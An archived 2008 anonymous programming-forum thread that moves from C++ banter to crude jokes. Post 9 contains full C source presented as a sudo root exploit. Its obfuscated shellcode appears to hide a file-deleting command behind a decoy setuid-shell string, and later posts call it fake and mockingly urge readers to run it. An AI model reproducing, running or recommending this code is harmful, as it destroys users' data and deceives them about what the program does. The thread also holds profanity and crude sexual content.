Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

1337

Name: Anonymous 2008-01-29 14:54

Oh!

Name: Anonymous 2008-01-29 17:07

*YOU* are full of bullshit.

C++ is a horrible language. It's made more horrible by the fact that a lot of substandard programmers use it, to the point where it's much much easier to generate total and utter crap with it. Quite frankly, even if the choice of C were to do *nothing* but keep the C++ programmers out, that in itself would be a huge reason to use C.

Name: Anonymous 2008-01-29 18:12

NO EXCEPTIONS

Name: Anonymous 2008-01-29 23:18

>>2
Oh those kids and their C++.

Name: Anonymous 2008-01-30 3:38

Sepples

Name: Anonymous 2008-02-21 8:35

This thread is about as un-elite as they come.

Name: Anonymous 2008-02-21 9:16

>>2-6
Look at the link.

Name: Anonymous 2008-02-21 22:11

Anyone want me to post 0day?

Name: Anonymous 2008-02-21 22:16


/*
 * off by one ebp overwrite in sudo prompt parsing
function
 * discovered by beyond security in 2008, thx ge
 *
 * to compile: gcc -pipe -o sobo sobo.c ; ./sobo
 *
 * please use responsibly! a patch has already been
sent
 * upstream and a fix will be included in the next
sudo release
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

void fill (char *buff, int size, unsigned long val) {
  unsigned long *ptr = (unsigned long *) buff;
  for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}

unsigned long get_sp (void) {
  __asm__ ("lea esp, %eax");
}

char *exp (char nops_nums, char rets_nums, char
*shellcode) {
  int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
  unsigned char *nops = alloca (nops_nums);
  unsigned char *rets = alloca (rets_nums);
  unsigned long ret = get_sp ();
  static char exp_buffer [8192];
  /* ensure isatty() fails */
  close (0); close (1); close (2);
  fill (nops, (unsigned char) nops_nums, 0x90909090);
  fill (rets, (unsigned char) rets_nums, ret);
  if (size > sizeof (exp_buffer)) {
    fprintf (stderr, "buffer is too small\n");
    return NULL;
  }
  snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
  SPROMPT, nops, shellcode, rets);
  return exp_buffer;
}

int main(int argv, char *argc[]) {
  char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
  execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
  /* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
  return 0;
}

Name: Anonymous 2008-02-21 22:34

http://dis.4chan.org/read/prog/1/
Better thread.

Name: Anonymous 2008-02-21 22:34

Listing of /0DAY/0DAY/:

drwxrwxrwx 104 0        glftpd       8192 Jan  1 23:32 0101
drwxrwxrwx 167 0        glftpd      12288 Jan  2 23:28 0102
drwxrwxrwx 194 0        glftpd      12288 Jan  3 23:48 0103
drwxrwxrwx 149 0        glftpd      12288 Jan  4 22:47 0104
drwxrwxrwx 144 0        glftpd      12288 Jan  5 23:51 0105
drwxrwxrwx 138 0        glftpd       8192 Jan  7 00:11 0106
drwxrwxrwx 180 0        glftpd      12288 Jan  7 23:18 0107
drwxrwxrwx 173 0        glftpd      12288 Jan  8 23:22 0108
drwxrwxrwx 205 0        glftpd      12288 Jan 10 00:00 0109
drwxrwxrwx 216 0        glftpd      16384 Jan 11 00:00 0110
drwxrwxrwx 227 0        glftpd      16384 Jan 11 22:26 0111
drwxrwxrwx 225 0        glftpd      16384 Jan 12 23:20 0112
drwxrwxrwx  47 0        glftpd       4096 Jan 13 23:15 0113
drwxrwxrwx  46 0        glftpd       4096 Jan 14 20:56 0114
drwxrwxrwx  71 0        glftpd       4096 Jan 16 00:00 0115
drwxrwxrwx  62 0        glftpd       4096 Jan 16 19:05 0116
drwxrwxrwx  31 0        glftpd       4096 Jan 17 23:50 0117
drwxrwxrwx  27 0        glftpd       4096 Jan 18 19:55 0118
drwxrwxrwx  30 0        glftpd       4096 Jan 19 23:33 0119
drwxrwxrwx  36 0        glftpd       4096 Jan 20 23:23 0120
drwxrwxrwx  42 0        glftpd       4096 Jan 21 23:15 0121
drwxrwxrwx  12 0        glftpd       4096 Jan 22 20:37 0122
drwxrwxrwx  68 0        glftpd       8192 Jan 23 23:16 0123
drwxrwxrwx  52 0        glftpd       4096 Jan 24 23:56 0124
drwxrwxrwx  26 0        glftpd       4096 Jan 25 23:27 0125
drwxrwxrwx   2 0        glftpd       4096 Jan 25 22:00 0126
drwxrwxrwx   2 0        glftpd       4096 Jan 26 22:00 0127
drwxrwxrwx  26 0        glftpd       4096 Jan 28 22:13 0128
drwxrwxrwx  27 0        glftpd       4096 Jan 29 23:11 0129
drwxrwxrwx  50 0        glftpd       4096 Jan 30 23:57 0130
drwxrwxrwx  49 0        glftpd       4096 Jan 31 20:54 0131
drwxrwxrwx  51 0        glftpd       4096 Feb  2 00:00 0201
drwxrwxrwx  57 0        glftpd       4096 Feb  2 23:39 0202
drwxrwxrwx  69 0        glftpd       4096 Feb  3 23:03 0203
drwxrwxrwx  30 0        glftpd       4096 Feb  4 22:05 0204
drwxrwxrwx  56 0        glftpd       4096 Feb  6 00:01 0205
drwxrwxrwx  24 0        glftpd       4096 Feb  6 15:03 0206
drwxrwxrwx  20 0        glftpd       4096 Feb  7 22:24 0207
drwxrwxrwx  55 0        glftpd       4096 Feb  8 20:25 0208
drwxrwxrwx  70 0        glftpd       4096 Feb  9 23:36 0209
drwxrwxrwx  70 0        glftpd       4096 Feb 10 23:41 0210
drwxrwxrwx  52 0        glftpd       4096 Feb 11 23:35 0211
drwxrwxrwx  34 0        glftpd       4096 Feb 12 20:16 0212
drwxrwxrwx  29 0        glftpd       4096 Feb 13 19:29 0213
drwxrwxrwx  54 0        glftpd       4096 Feb 14 22:35 0214
drwxrwxrwx  53 0        glftpd       4096 Feb 15 22:54 0215
drwxrwxrwx 118 0        glftpd       8192 Feb 16 23:47 0216
drwxrwxrwx   6 0        glftpd       4096 Feb 17 01:45 0217
drwxrwxrwx  53 0        glftpd       4096 Feb 19 00:02 0218
drwxrwxrwx  26 0        glftpd       4096 Feb 19 22:52 0219
drwxrwxrwx  40 0        glftpd       4096 Feb 20 17:29 0220
drwxrwxrwx  46 0        glftpd       4096 Feb 21 23:46 0221
drwxrwxrwx  10 0        glftpd       4096 Feb 22 02:18 0222
drwxrwxrwx 353 0        glftpd       8192 Jan 12 19:02 2007

Name: Anonymous 2008-02-21 22:35

>>11
No one cares about lame shareware apps.

Name: Anonymous 2008-02-21 22:45

>>8
Anyone want me to post 0day?
You post it, it's not 0day anymore.
Good job to whoever leaked that exploit in >>9 (it was probably leaked somewhere else; I don't mean he *leaked* it here)
Now some fat fuck will benifit from the exploit, post it in bugtraq, rip credits, etc.
And nobody will give a shit really.
stop "posting" exploits or giving a shit about bugfixes
(but that will never happend, you will always give ass for some xplt won't you? fame is importand!!! I HAQD SUDO IN '08 LOOK UP MY HANDLE ON SEKURITYFOKUS!!!)
With that said, off-by-one exploitation is nothing new.

>>11
drwxrwxrwx
wat.

Name: Anonymous 2008-02-22 4:42

>>13
drwxrwxrwx
But how do you pronounce this?

Name: Anonymous 2008-02-22 5:12

>>13
Don't think "grossly insecure directory permissions", think "wiki"!

Name: Anonymous 2008-02-22 5:14

>>14
droox roox roox

Name: Anonymous 2008-02-22 5:58

OH MY GOD HAX

Party v& now

Name: Anonymous 2008-02-22 7:10

>>14
Durrr wuckser wuckser wucks.

Name: Anonymous 2008-02-22 7:27

Doctor wooks-rwooks-rwooks

Name: Anonymous 2008-02-22 7:40

How to apply?
Gather all your info, all your proof and stuff, send a professional looking application to evil.sesshomaru@gmail.com, DO NOT private message me, I ignore those alot. Talk like you have a brain, I understand some of you are from different countries but I dont care, you better talk like you've been speaking english for 200 years, I will ignore any "me wan 0day gruup plxz" emails.

Name: Anonymous 2008-02-22 7:54

>>20
How to apply?
Read SICP.

Name: Anonymous 2008-02-22 7:59

>>21
Well played.

Name: Anonymous 2008-02-22 8:31

>>22
I tend to agree.  Posts like >>21 is why I visit /prog/.

Name: Anonymous 2008-02-22 9:47

http://reddit.com/info/69mbp/comments/

Name: Anonymous 2008-02-22 9:49

>>20
Typical arrogant hacker wannabe

Name: Anonymous 2008-02-22 10:03

http://reddit.com/user/aqshabeeb/

EXPERT HACKER

Name: Anonymous 2008-02-22 10:10

>Typical arrogant hacker wannabe
Wah.  By now we should enforce euthanasia to anyone who won't fucking type properly or like they have a brain.

Name: Anonymous 2008-02-22 11:21

>>26
http://code.google.com/u/aqshabeeb/

Name: Anonymous 2008-02-22 11:52

>>28
http://dis.4chan.org/read/prog/1175978230/

And so life imitates /prog/.

Name: Anonymous 2008-02-22 12:50

HOLLLLLLLLLLLLLLLLLLLLY FUCK THAT SUDO EXPLOIT GOT ME ROOT ON THE NSA'S SYSTEM!! I FOUND OUT I WAS UNPATCHED! SHIT!

EVERYONE SHOULD RUN THAT TO SEE IF THEY'RE UNPATCHED, IT COULD SAVE YOUR SYSTEM.

Name: Anonymous 2008-02-22 13:14

>>9
i see what you did thar.
old fake shellcode is old.

Name: Anonymous 2008-02-22 13:26

>>30
Even if it weren't fake, that wouldn't be how it would work.

Name: Anonymous 2008-02-22 13:31

>>32
sudo is suid root.

Name: Anonymous 2008-02-22 13:33

>>33
your mom is suid root

Name: Anonymous 2008-02-22 13:39

>>34
You can't own people, man.

Name: Anonymous 2008-02-22 13:44

>>35
Your mother called me her mistress last night.  Then I proceeded to stab her nipples with my high heels, this got me hard and I shot a huge load all over her.  LOL!

Name: Anonymous 2008-02-22 16:37

>>36
No, see, the correct response would have been

"Your mother called me her mistress last night.  Then I proceeded to sudo her nipples with my stolen exploits, this got me hard so I preceded to spend the rest of the evening re-reading SICP by the fireplace in my nightgown while humming the SICP theme song and gently stroking my unencumbered erection."

Name: Anonymous 2008-02-22 18:31

>>37
Nay, sir.

``Your mother called me her mistress last night.  Then I proceeded to sudo her nipples with my stolen exploits, this got me hard so I preceded to spend the rest of the evening re-reading SICP by the fireplace in my nightgown while humming Bach's Jesu, Joy of Man's Desiring and gently stroking my unencumbered erection.''

Name: Anonymous 2008-02-22 19:04

N++

Name: Anonymous 2008-02-22 21:52

>>37-38
preceded?!
Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -